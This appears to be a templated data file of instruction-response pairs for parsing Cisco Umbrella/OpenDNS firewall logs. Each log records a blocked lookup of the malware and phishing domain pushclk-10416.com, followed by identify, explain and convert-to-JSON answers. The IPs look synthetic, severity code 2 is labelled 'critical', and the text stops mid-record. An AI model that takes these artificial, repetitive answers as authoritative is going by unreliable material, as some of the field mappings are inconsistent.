WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 149.22.203.83
serverIP: 183.79.58.28
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"197.90.56.12\",\"externalIp\":\"31.147.64.180\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "197.90.56.12",
"serverIP": "31.147.64.180",
"userName": "nighthawk"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"197.90.56.12","externalIp":"31.147.64.180","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=197.90.56.12 ::: serverIP=31.147.64.180 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 197.90.56.12
serverIP: 31.147.64.180
userName: nighthawk | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"244.216.172.63\",\"externalIp\":\"241.136.89.108\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "244.216.172.63",
"serverIP": "241.136.89.108",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"244.216.172.63","externalIp":"241.136.89.108","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=244.216.172.63 ::: serverIP=241.136.89.108 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 244.216.172.63
serverIP: 241.136.89.108
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"177.15.242.46\",\"externalIp\":\"77.4.39.181\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "177.15.242.46",
"serverIP": "77.4.39.181",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"177.15.242.46","externalIp":"77.4.39.181","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=177.15.242.46 ::: serverIP=77.4.39.181 ::: userName=janedoe ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 177.15.242.46
serverIP: 77.4.39.181
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"141.58.88.113\",\"externalIp\":\"220.173.141.211\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "141.58.88.113",
"serverIP": "220.173.141.211",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"141.58.88.113","externalIp":"220.173.141.211","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=141.58.88.113 ::: serverIP=220.173.141.211 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 141.58.88.113
serverIP: 220.173.141.211
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"210.100.146.99\",\"externalIp\":\"37.107.48.148\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "210.100.146.99",
"serverIP": "37.107.48.148",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"210.100.146.99","externalIp":"37.107.48.148","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=210.100.146.99 ::: serverIP=37.107.48.148 ::: userName=alice ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 210.100.146.99
serverIP: 37.107.48.148
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"152.220.28.204\",\"externalIp\":\"145.196.89.123\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "152.220.28.204",
"serverIP": "145.196.89.123",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"152.220.28.204","externalIp":"145.196.89.123","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=152.220.28.204 ::: serverIP=145.196.89.123 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T20:29:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 152.220.28.204
serverIP: 145.196.89.123
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"176.7.198.1","externalIp":"28.145.115.161","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=176.7.198.1 ::: serverIP=28.145.115.161 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
